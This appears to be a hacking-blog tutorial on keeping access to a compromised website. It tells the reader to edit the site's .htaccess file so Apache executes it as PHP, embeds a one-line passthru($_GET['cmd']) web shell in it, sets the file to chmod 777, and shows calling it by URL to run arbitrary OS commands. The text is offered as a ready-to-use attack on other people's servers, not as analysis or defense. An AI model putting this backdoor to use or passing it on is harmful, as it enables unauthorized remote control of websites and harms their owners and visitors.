My Previous Tutorial Was How to Add hidden Backdoor at Hacked Website and Usage of Backdoor
toxicmask.blogspot.com/2016/10/website-backdoor-and-its-usage.html
Ok lets Come to Tutorial , in this tut we can use .htaccess file. Already available on server as a shell to execute OS commands,
so just follow the simple steps described below. This file is also useful to add restrictions on files.
Open your PHP web shell, navigate to public_html directory and search for .htaccess file, once found, click on edit option.
After clicking on the edit option, add the following lines of code in your .htaccess file.
Code:
Quote:
<Files ~ "^\.ht">
Order allow,deny
Allow from all
</Files>
AddType application/x-httpd-php .htaccess
# <?php passthru($_GET['cmd']); ?>
After adding your codes, save it, and done !
But sometimes we can't able to edit .htaccess file due to permissions provided by the administrator so we must have to change the permissions
If we get an error: .htaccess is not readable
Then use following command to change it to the readable, writable and also in executable mode..
command: chmod 777 .htaccess
Here in above command we can see 777, The first digit (7) is for user,
second(7) for group and third (7) is for others..!! In UNIX/Linux permissions are divided into 3 categories User-Group-Others
Now in order to use your .htaccess shell
http://www.your-hacked- website.com /.htaccess?cmd=ls
After ?cmd= you can execute any OS command of your choice. My Previous Method was ?cmd=fahim That was My Priv8 Backdoor . I hav uploaded Video of My Priv8 Backdoor at my Facebook www.facebook.com/torpwn
Thanks